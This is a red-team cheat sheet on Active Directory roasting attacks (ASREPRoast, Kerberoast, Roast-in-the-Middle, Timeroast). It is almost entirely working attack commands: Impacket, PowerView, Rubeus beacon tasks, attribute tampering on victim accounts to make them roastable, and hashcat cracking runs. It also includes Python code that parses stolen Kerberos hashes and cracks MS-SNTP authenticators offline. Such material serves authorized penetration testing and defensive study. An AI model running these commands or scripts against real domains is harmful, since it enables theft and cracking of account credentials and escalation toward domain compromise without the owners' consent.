# Roasting

## ASREPRoasting

Show domain users with the `DONT_REQ_PREAUTH` flag set (`userAccountControl` bit `0x400000` = 4194304), i.e. accounts whose AS-REP can be requested without knowing the password:

```
PowerView3 > Get-DomainUser -UACFilter DONT_REQ_PREAUTH
```

### Normal

#### GetNPUsers.py

* <https://vbscrub.com/2020/02/22/impackets-getnpusers-script-explained/>

```
$ GetNPUsers.py megacorp.local/ -dc-ip 127.0.0.1 -no-pass -usersfile ~/ws/enum/names.txt -request -outputfile asrep.in | tee GetNPUsers.out
$ cat GetNPUsers.out | grep -v 'Client not found in Kerberos database'
$ hashcat -m 18200 -O -a 0 -w 3 --session=asrep -o asrep.out asrep.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
```

#### ASREPRoast.ps1

* <https://github.com/HarmJ0y/ASREPRoast>

```
PS > Get-ASREPHash -Domain megacorp.local -UserName snovvcrash
```

#### Rubeus

```
beacon> execute-assembly ADSearch.exe --search "(&(sAMAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname
beacon> execute-assembly Rubeus.exe asreproast /nowrap [/user:svc_mssql]
```

### Targeted

* <https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#asreproast>

> "Given GenericWrite/GenericAll DACL rights over a target, we can modify most of the user's attributes. We can change a victim's userAccountControl to not require Kerberos preauthentication, grab the user's crackable AS-REP, and then change the setting back." (@harmj0y, [ref](https://www.harmj0y.net/blog/activedirectory/targeted-kerberoasting/))

```
PowerView3 > Get-DomainUser snovvcrash | ConvertFrom-UACValue
PowerView3 > Set-DomainObject -Identity snovvcrash -XOR @{useraccountcontrol=4194304} -Verbose
PowerView3 > Get-DomainUser snovvcrash | ConvertFrom-UACValue
ASREPRoast > Get-ASREPHash -Domain megacorp.local -UserName snovvcrash
PowerView3 > Set-DomainObject -Identity snovvcrash -XOR @{useraccountcontrol=4194304} -Verbose
PowerView3 > Get-DomainUser snovvcrash | ConvertFrom-UACValue
```

## Kerberoasting

* <http://www.harmj0y.net/blog/redteaming/rubeus-now-with-more-kekeo/>
* <https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/>
* <https://github.com/GhostPack/Rubeus#kerberoast>
* <https://docs.microsoft.com/ru-ru/archive/blogs/openspecification/windows-configurations-for-kerberos-supported-encryption-type>
* <https://swarm.ptsecurity.com/kerberoasting-without-spns/>
* <https://habr.com/ru/post/650889/>
* <https://m365internals.com/2021/11/08/kerberoast-with-opsec/>
* <https://github.com/Luct0r/KerberOPSEC>
* <https://redcanary.com/blog/marshmallows-and-kerberoasting/>
* <https://www.trustedsec.com/blog/the-art-of-bypassing-kerberoast-detections-with-orpheus/>
* <https://github.com/trustedsec/orpheus>

{% embed url="https://twitter.com/_wald0/status/1361720293539139589" %}

Check the `msDS-SupportedEncryptionTypes` attribute to see whether RC4 is enabled for the account (bit `0x4` = RC4-HMAC, `0x8` = AES128, `0x10` = AES256; an unset attribute means the KDC falls back to its default, which includes RC4 unless the domain has been hardened). Only an RC4-encrypted TGS (etype 23) gives the fast-to-crack hashcat mode 13100:

```
PowerView3 > Get-DomainUser -Identity snovvcrash -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes
```

### Normal

#### GetUserSPNs.py

```
$ GetUserSPNs.py megacorp.local/snovvcrash:'Passw0rd!' -dc-ip 127.0.0.1 -request -outputfile tgsrep.in
$ hashcat -m 13100 -O -a 0 -w 3 --session=tgsrep -o tgsrep.out tgsrep.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
```

{% hint style="info" %}
If the LDAP(S) ports are blocked, kerberoasting can still be performed over the Global Catalog port (3268/TCP). For that purpose, [change](https://github.com/fortra/impacket/blob/3c6713e309cae871d685fa443d3e21b7026a2155/examples/GetUserSPNs.py#L268) the `ldap://` scheme to `gc://`.
{% endhint %}

Having cracked NTDS, check whether any of the kerberoastable users are **brutable** (their password was cracked) and have [a path to high value targets](https://github.com/ShutdownRepo/Exegol-images/blob/dcc67cbb8ec69e3dd80aa0f2d8f78980730d3dca/sources/bloodhound/customqueries.json#L34) (useful when writing a report):

```
$ cat ~/ws/enum/tgsrep.in | grep -Pho 'krb5tgs\$23\$.*?\$' | cut -d'*' -f2 | cut -d'$' -f1 > t

$ for acc in `cat t`; do grep -ai $acc ~/ws/loot/ntds.cracked | cut -d: -f1 >> t2; done && rm t

$ vi t2
...convert domain prefix to domain suffix (megacorp.local\svcsql -> svcsql@megacorp.local)...

$ python3 max.py -u neo4j -p 'WeaponizeK4li!' mark-owned -f t2 --add-note "kerberoasted" && rm t2

$ python3 max.py -u neo4j -p 'WeaponizeK4li!' query -q 'MATCH p=shortestPath((n {owned:true})-[:MemberOf|HasSession|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|CanRDP|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GpLink|AddAllowedToAct|AllowedToAct|SQLAdmin|ReadGMSAPassword|HasSIDHistory|CanPSRemote*1..5]->(m {highvalue:true})) WHERE NOT n=m RETURN p' --path
```
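The `grep 'krb5tgs\$23\$'` in the pipeline above only picks up RC4 (etype 23) hashes, so accounts whose TGS came back AES-encrypted (`$krb5tgs$17$` / `$krb5tgs$18$`, the ones the RC4 downgrade references below are about) silently drop out of the report check, and mixing etypes in one file breaks a single `hashcat -m` run. The following added example (not impacket, hashcat or Max code) parses all three TGS-REP formats plus the AS-REP format, buckets the lines per hashcat mode, and emits the lowercase `user@realm` form the `mark-owned` step expects. The sample hashes are constructed with truncated ciphertext and only follow the shape of impacket's output.

```python
#!/usr/bin/env python3
"""Parse impacket/hashcat-style roasting hashes, bucket them per hashcat mode
and emit the user@realm list used for the BloodHound 'owned' marking step.

Added example for this page; not part of impacket, hashcat or Max."""

import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Hash formats as written by GetNPUsers.py / GetUserSPNs.py (hashcat format):
#   $krb5asrep$23$user@REALM:<checksum>$<edata>          -> hashcat 18200
#   $krb5tgs$23$*user$REALM$spn*$<checksum>$<edata>      -> hashcat 13100 (RC4)
#   $krb5tgs$17$user$REALM$*spn*$<checksum>$<edata>      -> hashcat 19600 (AES128)
#   $krb5tgs$18$user$REALM$*spn*$<checksum>$<edata>      -> hashcat 19700 (AES256)
PATTERNS = [
    ("asrep", re.compile(r"^\$krb5asrep\$(?P<etype>23)\$(?P<user>[^@$]+)@(?P<realm>[^:$]+):"
                         r"(?P<checksum>[0-9a-f]+)\$(?P<edata>[0-9a-f]+)$", re.I)),
    ("tgs", re.compile(r"^\$krb5tgs\$(?P<etype>23)\$\*(?P<user>[^$*]+)\$(?P<realm>[^$*]+)\$(?P<spn>[^*]+)\*\$"
                       r"(?P<checksum>[0-9a-f]+)\$(?P<edata>[0-9a-f]+)$", re.I)),
    ("tgs", re.compile(r"^\$krb5tgs\$(?P<etype>17|18)\$(?P<user>[^$*]+)\$(?P<realm>[^$*]+)\$\*(?P<spn>[^*]+)\*\$"
                       r"(?P<checksum>[0-9a-f]+)\$(?P<edata>[0-9a-f]+)$", re.I)),
]

HASHCAT_MODES = {("asrep", 23): 18200, ("tgs", 23): 13100, ("tgs", 17): 19600, ("tgs", 18): 19700}


@dataclass(frozen=True)
class RoastHash:
    kind: str      # "asrep" or "tgs"
    etype: int     # Kerberos encryption type of the returned blob
    user: str
    realm: str
    spn: str       # empty for AS-REP
    raw: str       # original line, kept for writing per-mode input files

    @property
    def hashcat_mode(self) -> int:
        return HASHCAT_MODES[(self.kind, self.etype)]

    @property
    def rc4(self) -> bool:
        """etype 23 (RC4-HMAC) is the fast case; AES etypes cost 4096 PBKDF2 rounds per guess."""
        return self.etype == 23

    @property
    def upn(self) -> str:
        """user@realm in lowercase, the form the BloodHound/Max 'mark-owned' step expects."""
        return f"{self.user}@{self.realm}".lower()


def parse_roast_hashes(lines: Iterable[str]) -> List[RoastHash]:
    """Parse every recognised hash line; anything else (tool banners, errors) is skipped."""
    out = []
    for line in lines:
        line = line.strip()
        for kind, pat in PATTERNS:
            m = pat.match(line)
            if m:
                out.append(RoastHash(kind, int(m["etype"]), m["user"], m["realm"],
                                     m.groupdict().get("spn") or "", line))
                break
    return out


def split_by_hashcat_mode(hashes: Iterable[RoastHash]) -> Dict[int, List[str]]:
    """Group raw lines per hashcat mode so each bucket gets its own -m run."""
    buckets: Dict[int, List[str]] = {}
    for h in hashes:
        buckets.setdefault(h.hashcat_mode, []).append(h.raw)
    return buckets


def aes_only_accounts(hashes: Iterable[RoastHash]) -> List[str]:
    """Accounts whose TGS came back AES-encrypted: candidates for an RC4 downgrade request."""
    return sorted({h.upn for h in hashes if h.kind == "tgs" and not h.rc4})


# Constructed sample input (shapes follow impacket output; ciphertext truncated).
SAMPLE = """\
$krb5asrep$23$jdoe@MEGACORP.LOCAL:0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff
$krb5tgs$23$*svc_mssql$MEGACORP.LOCAL$MSSQLSvc/sql01.megacorp.local:1433*$0123456789abcdef0123456789abcdef$ffeeddccbbaa99887766554433221100
$krb5tgs$18$svc_http$MEGACORP.LOCAL$*HTTP/web01.megacorp.local*$0123456789abcdef01234567$ffeeddccbbaa99887766554433221100
[-] User guest doesn't have UF_DONT_REQUIRE_PREAUTH set
"""

if __name__ == "__main__":
    hashes = parse_roast_hashes(SAMPLE.splitlines())
    for mode, lines in sorted(split_by_hashcat_mode(hashes).items()):
        print(f"hashcat -m {mode}: {len(lines)} hash(es)")
    print("AES-only TGS (downgrade candidates):", aes_only_accounts(hashes))
    print("UPNs for mark-owned:", [h.upn for h in hashes])
```

Feed each bucket to its own `hashcat -m <mode>` run and the `upn` list to `max.py mark-owned` instead of the `grep`/`cut`/`vi` steps; the AES-only list is the set of accounts worth revisiting with an RC4 downgrade request.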

#### PowerView

* [https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1#L2777)

```
PowerView3 > Invoke-Kerberoast -OutputFormat Hashcat | fl
```

#### Rubeus

* <https://github.com/GhostPack/Rubeus>

```
beacon> execute-assembly ADSearch.exe --search "(&(sAMAccountType=805306368)(servicePrincipalName=*))"
beacon> execute-assembly Rubeus.exe kerberoast /format:hashcat /nowrap [/usetgtdeleg] [/user:svc_mssql]
```

### Targeted

> "We can execute 'normal' Kerberoasting instead: given modification rights on a target, we can change the user's serviceprincipalname to any SPN we want (even something fake), Kerberoast the service ticket, and then repair the serviceprincipalname value." (@harmj0y, [ref](https://www.harmj0y.net/blog/activedirectory/targeted-kerberoasting/))

```
PowerView3 > Get-DomainUser snovvcrash | select serviceprincipalname
PowerView3 > Set-DomainObject -Identity snovvcrash -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
PowerView3 > $User = Get-DomainUser snovvcrash 
PowerView3 > $User | Get-DomainSPNTicket | fl
PowerView3 > $User | select serviceprincipalname
PowerView3 > Set-DomainObject -Identity snovvcrash -Clear serviceprincipalname
```

### Roast-in-the-Middle

* <https://www.semperis.com/blog/new-attack-paths-as-requested-sts/>
* <https://github.com/Tw1sm/RITM>

```
$ sudo ritm -t/--target 192.168.1.123 -g/--gateway 192.168.1.1 -d/--dc-ip 192.168.1.11 -u/--users-file users.txt
```

### Downgrading Encryption Type (RC4)

* <https://posts.specterops.io/kerberoasting-revisited-d434351bd4d1>
* <https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled>
* <https://vbscrub.com/tag/kerberos/>

## Timeroasting

* [\[PDF\] Timeroasting, Trustroasting and Computer Spraying (Secura)](https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf)
* <https://github.com/SecuraBV/Timeroast>

```
$ python3 timeroast.py -a 50 -t 120 -o sntp.in 192.168.1.11
$ hashcat -m31300 -O -a0 -w3 --session=sntp -o sntp.out sntp.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
$ hashcat -m10 -O -a0 -w3 --session=sntp -o sntp.out sntp.in nthashes.txt --hex-wordlist --hex-salt
```
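To see what the two hashcat lines above are actually cracking, here is an added example (not code from the Timeroast project or hashcat) that builds the MS-SNTP authenticator the way the Secura paper describes it, `MD5(NT_hash || 48-byte NTP header)` with the computer account's RID in the key identifier field, formats it as the `RID:$sntp-ms$<mac>$<header>` line `timeroast.py` writes, and then checks candidates offline either from passwords (what `-m 31300` does) or from NT hashes (what `-m 10 --hex-wordlist --hex-salt` does). The NTP header and RID are constructed; MD4 is implemented inline because `hashlib.new('md4')` is disabled in most OpenSSL 3 builds; the little-endian RID in the key identifier is an assumption of the demo and does not affect the MAC.

```python
#!/usr/bin/env python3
"""MS-SNTP authenticator as used by timeroasting: build the hashcat 31300 line
from a DC response and check candidate passwords / NT hashes against it offline.

Added example for this page; not code from the Timeroast project or hashcat."""

import hashlib
import struct
from typing import Iterable, Optional, Tuple

MASK = 0xFFFFFFFF
NTP_HEADER_LEN = 48


def _md4(data: bytes) -> bytes:
    """Minimal MD4 (RFC 1320); needed for NT hashes since OpenSSL 3 usually ships without md4."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                                                           # round 1
            a = rotl((a + F(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)):  # round 2
            a = rotl((a + G(b, c, d) + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):  # round 3
            a = rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is the MS-SNTP key for a computer account."""
    return _md4(password.encode("utf-16-le"))


def sntp_ms_mac(nt: bytes, header48: bytes) -> bytes:
    """MS-SNTP authenticator: plain MD5 over NT hash || 48-byte NTP header (no HMAC)."""
    if len(nt) != 16 or len(header48) != NTP_HEADER_LEN:
        raise ValueError("need a 16-byte NT hash and a 48-byte NTP header")
    return hashlib.md5(nt + header48).digest()


def hashcat_line(rid: int, response: bytes) -> str:
    """68-byte authenticated DC response -> 'RID:$sntp-ms$<mac>$<header>' (hashcat -m 31300)."""
    if len(response) != NTP_HEADER_LEN + 4 + 16:
        raise ValueError("authenticated MS-SNTP response must be 68 bytes")
    header, mac = response[:NTP_HEADER_LEN], response[-16:]
    return f"{rid}:$sntp-ms${mac.hex()}${header.hex()}"


def parse_hashcat_line(line: str) -> Tuple[int, bytes, bytes]:
    rid, _, rest = line.partition(":")
    tag, mac_hex, hdr_hex = rest.split("$")[1:]
    if tag != "sntp-ms":
        raise ValueError("not an $sntp-ms$ line")
    return int(rid), bytes.fromhex(mac_hex), bytes.fromhex(hdr_hex)


def crack(line: str, passwords: Iterable[str] = (), nt_hashes: Iterable[bytes] = ()) -> Optional[str]:
    """Offline equivalent of the two hashcat runs: -m 31300 over passwords, -m 10 over NT hashes."""
    _, mac, header = parse_hashcat_line(line)
    for pw in passwords:
        if sntp_ms_mac(nt_hash(pw), header) == mac:
            return pw
    for nt in nt_hashes:
        if sntp_ms_mac(nt, header) == mac:
            return nt.hex()
    return None


# Constructed 48-byte NTP server header (LI/VN/mode 0x1c, stratum 1, four fixed timestamps).
DEMO_HEADER = bytes([0x1C, 0x01, 0x11, 0xE9]) + bytes(8) + b"LOCL" + struct.pack(">QQQQ", *([0xE8C8F6A000000000] * 4))
assert len(DEMO_HEADER) == NTP_HEADER_LEN


def build_demo_response(rid: int, password: str) -> bytes:
    """What a DC would answer for a computer account with this RID/password (key id assumed little-endian)."""
    return DEMO_HEADER + struct.pack("<I", rid) + sntp_ms_mac(nt_hash(password), DEMO_HEADER)


if __name__ == "__main__":
    line = hashcat_line(1103, build_demo_response(1103, "password"))
    print(line)
    print("cracked:", crack(line, passwords=["Winter2024", "password"]))
```

Because the MAC is a bare MD5 keyed only by the NT hash, a list of NT hashes from a cracked NTDS (the `-m 10` line) works just as well as a wordlist, which is why reused machine-account passwords show up quickly here.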

### Targeted

* <https://medium.com/@offsecdeer/targeted-timeroasting-stealing-user-hashes-with-ntp-b75c1f71b9ac>
* <https://github.com/OffsecDeer/TargetedTimeroast>
* <https://github.com/PShlyundin/TimeSync>
